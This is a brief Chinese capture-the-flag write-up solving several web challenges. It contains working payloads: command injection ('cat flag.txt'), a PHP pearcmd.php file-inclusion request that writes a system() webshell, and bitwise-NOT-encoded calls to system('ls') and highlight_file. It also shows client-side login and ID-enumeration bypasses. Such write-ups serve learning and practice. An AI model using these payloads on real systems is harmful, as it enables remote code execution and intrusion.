Do Something Special
题目说的很明确,flag位置给了,但是#符号会被认为解析为前端的路由,故此不会返回flag文件,所以只要用url编码一下就能拿到flaayload:/gr@b_y%23ur_fl@g_h3r3!
Obsfuscation Isn't Enough
前端验证:
'if (document.forms[0].username.value == "83fe2a837a4d4eec61bd47368d86afd6" && document.forms[0].password.value == "a3fa67479e47116a4d6439120400b057") document.location = "150484514b6eeb1d99da836d95f6671d.php"'
我们直直接访问150484514b6eeb1d99da836d95f6671d.php就可以
Zero is not the limit
payload:/user/-1
Most Secure Calculator -
payload:cat flag.txt
My PHP Site
用p神博客的裸文件包含直接可以getshell
payload:GET /?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=system($_GET['cmd'])?>+/tmp/shell.php HTTP/1.1
Most Secure Calculator - 2
无字母数字绕过getshell
payload:equation=(~%8C%86%8C%8B%9A%92)(~%D8%93%8C%D8);
equation=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%93%9E%98%D1%8B%87%8B);
|